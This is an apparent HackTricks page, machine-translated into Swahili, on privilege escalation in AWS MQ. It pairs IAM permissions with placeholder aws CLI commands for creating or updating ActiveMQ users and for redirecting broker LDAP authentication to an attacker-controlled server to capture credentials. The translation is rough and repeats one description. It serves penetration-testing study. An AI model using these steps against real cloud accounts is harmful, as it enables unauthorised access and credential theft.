AWS - MQ Privesc

Reading time: 3 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

MQ

Kwa maelezo zaidi kuhusu MQ angalia:

AWS - MQ Enum

mq:ListBrokers, mq:CreateUser

Kwa ruhusa hizo unaweza kuunda mtumiaji mpya katika broker ya ActimeMQ (hii haifanyi kazi katika RabbitMQ):

bash
aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>

Madhara Yanayoweza Kutokea: Upatikanaji wa taarifa nyeti kupitia ActiveMQ

mq:ListBrokers, mq:ListUsers, mq:UpdateUser

Kwa ruhusa hizo unaweza kuunda mtumiaji mpya katika broker ya ActimeMQ (hii haifanyi kazi katika RabbitMQ):

bash
aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>

Madhara Yanayoweza Kutokea: Kupata taarifa nyeti kwa kuzunguka ActiveMQ

mq:ListBrokers, mq:UpdateBroker

Ikiwa broker inatumia LDAP kwa ajili ya idhini na ActiveMQ. Inawezekana kubadilisha mipangilio ya seva ya LDAP inayotumika kuwa moja inayodhibitiwa na mshambuliaji. Kwa njia hii mshambuliaji ataweza kuiba nyaraka zote zinazotumwa kupitia LDAP.

bash
aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...

Ikiwa unaweza kwa namna fulani kupata akiba za awali zilizotumika na ActiveMQ unaweza kufanya MitM, kuiba akiba, kuzitumia kwenye seva ya awali, na kutuma jibu (labda kwa kurudia tu akiba zilizibwa unaweza kufanya hivi).

Athari Zinazoweza Kutokea: Iba akiba za ActiveMQ

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks